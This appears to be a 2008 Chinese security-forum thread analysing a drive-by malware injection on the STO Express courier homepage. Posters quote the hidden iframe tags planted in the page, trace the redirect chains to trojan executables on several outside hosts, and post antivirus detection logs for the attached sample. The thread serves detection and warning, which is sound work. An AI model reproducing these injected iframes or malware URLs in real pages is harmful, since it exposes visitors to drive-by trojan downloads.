查看: 6465|回复: 17
收起左侧

[已鉴定] "申通快递"主页的计数器还是有问题的

 关闭 [复制链接]
ALEXBLAIR
发表于 2008-3-30 18:05:46 | 显示全部楼层 |阅读模式
不知道为什么,申通快递得那个帖子被锁定了
不过,还是进去看看(冲动总是恶魔~~~)

打开后,发现的确有东西可看

  1. <BODY text=#000000><IFRAME src="http://60.190.118.244/5.htm" frameBorder=0 width=20 height=0></IFRAME>]
复制代码

头部的代码之后就是转接了
大概是这样的


  1. <IFRAME src="http://60.190.118.244/5.htm" frameBorder=0 width=20 height=0></IFRAME>

  2.     --> <iframe src=http://60.190.118.244/vip.htm width=0 height=0></iframe>

  3.       --><iframe src=614.htm width=0 height=0></iframe>

  4.                 -->http://60.190.118.243/x.exe

  5.       --><iframe src=real.htm width=100 height=0></iframe>

  6.                 -->http://60.190.118.243/x.exe

  7.       --><iframe src=lz.htm width=100 height=0></iframe>

  8.                 -->http://60.190.118.243/x.exe

复制代码

x.rar

7.56 KB, 下载次数: 130

评分

参与人数 1经验 +10 收起 理由
promised + 10 感谢解答: )

查看全部评分

aerbeisi
发表于 2008-3-30 18:07:03 | 显示全部楼层
[Found security risk]         <W32/OnlineGames.H.gen!Eldorado (not disinfectable, generic)>        C:\test\x.rar->x.exe
秋叶濛濛
发表于 2008-3-30 18:08:36 | 显示全部楼层
额 果然还是有问题
把眼睛都看花了也没找出来

Log is generated by FreShow.
[wide]http://www.sto.cn
    [frame]http://60.190.118.244/5.htm
        [frame]http://60.190.118.244/vip.htm
            [frame]http://60.190.118.244/614.htm
                [object]http://60.190.118.243/x.exe
            [frame]http://60.190.118.244/real.htm
                [object]http://60.190.118.243/x.exe
            [frame]http://60.190.118.244/lz.htm
                [object]http://60.190.118.243/x.exe

haohaoxuexi

[ 本帖最后由 秋叶濛濛 于 2008-3-30 18:17 编辑 ]
2008-03-30_182539.jpg
Palkia
发表于 2008-3-30 18:12:04 | 显示全部楼层
病毒: Trojan.Win32.Undef.efz
lx1234
发表于 2008-3-30 18:12:55 | 显示全部楼层
2008-3-30 18:12:25        文件系统实时防护        文件        F:\下载\x.exe.td        Win32/TrojanDownloader.Agent.NXA 特洛伊木马 的变种        通过删除清除 - 已隔离        NT AUTHORITY\SYSTEM        在被应用程序修改的文件上发生事件: D:\Program Files\Thunder\Program\Thunder5.exe.
Exia 该用户已被删除
发表于 2008-3-30 18:18:01 | 显示全部楼层
Starting the file scan:

Begin scan in 'D:\x.rar'
D:\x.rar
  [0] Archive type: RAR
  --> x.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
      [INFO]      The file was deleted!
tanlimo
发表于 2008-3-30 18:20:34 | 显示全部楼层
这个地址时有时无而且还会自动改变:<iframe src=http://60.190.118.244/5.htm width=20 height=0 frameborder=0></iframe>

现在是:
<iframe src=http://www.555abc.com/yahoo/index.htm?604 width=0 height=0></iframe>

可能是服务器那边有arp

3.jpg

4.jpg


Log is generated by FreShow.
[wide]http://www.sto.cn
    [frame]http://www.555abc.com/yahoo/index.htm?604
        [frame]http://www.555abc.com/yahoo/*
            [script]http://adsl.jk33581.com/web/1.js
            [script]http://adsl.jk33581.com/web/bf.js
            [script]http://adsl.jk33581.com/web/pps.js
            [frame]http://adsl.jk33581.com/web/3.htm
        [script]http://www.555abc.com/yahoo/Ajax.gif
            [frame]http://adsl.jk33581.com/web/rl.htm
            [object]http://www.555abc.com/yahoo/yes.exe
        [frame]http://www.555abc.com/yahoo/Ms06014.htm
            [object]http://www.555abc.com/yahoo/yes.exe
        [script]http://www.555abc.com/yahoo/Real.js
        [script]http://www.555abc.com/yahoo/Bfyy.gif
        [script]http://www.555abc.com/yahoo/XunLei.gif
        [script]http://www.555abc.com/yahoo/Lz.gif
        [frame]http://www.555abc.com/yahoo/QVod.html
        [frame]http://www.555abc.com/yahoo/Ms07004.html
        [frame]http://www.555abc.com/yahoo/07033.htm
        [frame]http://www.555abc.com/yahoo/ienorun.htm
        [frame]http://www.555abc.com/yahoo/xunlei.htm
        [frame]http://www.555abc.com/yahoo/cx.htm
        [frame]http://www.555abc.com/yahoo/baidu.htm
        [frame]http://adsl.jk33581.com/web/6601220.htm
            [frame]http://adsl.jk33581.com/web/htm.html
                [script]http://adsl.jk33581.com/web/1.js
                    [object]http://exe.xinniankl.com/014.exe
                [script]http://adsl.jk33581.com/web/bf.js
                    [object]http://exe.xinniankl.com/bf.exe
                [script]http://adsl.jk33581.com/web/pps.js
                    [object]http://exe.xinniankl.com/pps.exe
                [frame]http://adsl.jk33581.com/web/3.htm
                    [object]http://exe.xinniankl.com/lz.exe
        [frame]http://75.cncz.us/kew75.htm?hj
            [frame]http://75.cncz.us/w/u.html
                [frame]http://75.cncz.us/w/1.gif
                    [object]http://u3.cncz.us/d/614.exe
                [frame]http://75.cncz.us/w/2.gif
                    [object]http://u.cncz.us/d/rl.exe
                [frame]http://75.cncz.us/w/3.gif
                    [object]http://u.cncz.us/d/bf.exe
                [frame]http://75.cncz.us/w/4.gif
                    [object]http://u.cncz.us/d/pps.exe
                [frame]http://75.cncz.us/w/5.gif
                    [object]http://u.cncz.us/d/lz.exe
                [frame]http://75.cncz.us/w/6.gif
                    [object]http://u.cncz.us/d/xl.exe
            [frame]http://75.cncz.us/20080318/u.html
                [frame]http://75.cncz.us/20080318/1.gif
                    [object]http://20080318.2008dajiafa.cn/614.exe
                [frame]http://75.cncz.us/20080318/2.gif
                    [object]http://20080318.2008dajiafa.cn/rl.exe
                [frame]http://75.cncz.us/20080318/3.gif
                    [object]http://20080318.2008dajiafa.cn/bf.exe
                [frame]http://75.cncz.us/20080318/4.gif
                    [object]http://20080318.2008dajiafa.cn/pps.exe
                [frame]http://75.cncz.us/20080318/5.gif
                    [object]http://20080318.2008dajiafa.cn/lz.exe
                [frame]http://75.cncz.us/20080318/6.gif
                    [object]http://20080318.2008dajiafa.cn/xl.exe
                [object]http://20080318.2008dajiafa.cn/ad.cab
        [frame]http://web.haole1.cn/web/ww004.htm
            [frame]http://web.haole1.cn/web/06014.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/yyfb.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/pps.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/lz.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/cx.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/IENoRun.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/xunlei.htm
                [object]http://www.cfjs119.cn/down/001.exe
            [frame]http://web.haole1.cn/web/07004.htm
            [frame]http://web.haole1.cn/web/0733.htm
            [frame]http://web.haole1.cn/web/baidu.htm
        [frame]http://xxx.er19.com/output/1/11.asp
            [frame]http://dd00.2008dajiafa.cn/vip/Zn36517.htm
            [frame]http://75.cncz.us/kew75.htm?11
            [frame]http://www.haole555.cn/tj1/main.htm
            [frame]http://aaa.faba01.com/hao109.htm
            [frame]http://club.pchome.net/forum_5_45____.html
            [frame]http://www.music100000.cn/wm/222.htm
            [frame]http://adsl.jk33581.com/web/6604635.htm
            [frame]http://www.916kk.com/index.htm
            [frame]http://wb.shijiediyi.net/one/huai4.htm?804
            [script]http://s16.cnzz.com/stat.php?id=809081&web_id=809081&show=pic
            [frame]http://club.pchome.net/forum_1_15.html
            [frame]http://75.cncz.us/kew75.htm?11
            [frame]http://www.music100000.cn/wm/222.htm
            [frame]http://adsl.jk33581.com/web/6604635.htm
            [frame]http://www.916kk.com/index.htm
        [script]http://www.555abc.com/yahoo/b.js
        [script]http://js.users.51.la/1720746.js

我的天!不来啦,谁继续........

[ 本帖最后由 tanlimo 于 2008-3-30 19:10 编辑 ]
秋叶濛濛
发表于 2008-3-30 18:22:14 | 显示全部楼层
原帖由 tanlimo 于 2008-3-30 18:20 发表
这个地址时有时无:

可能是服务器那边有arp



恩 上午看的时候还没有
tracydk
发表于 2008-3-30 18:22:37 | 显示全部楼层
avg不杀
深红的雪
发表于 2008-3-30 18:25:56 | 显示全部楼层
直接被遨游block掉了
20.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 02:01 , Processed in 0.137192 second(s), 21 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表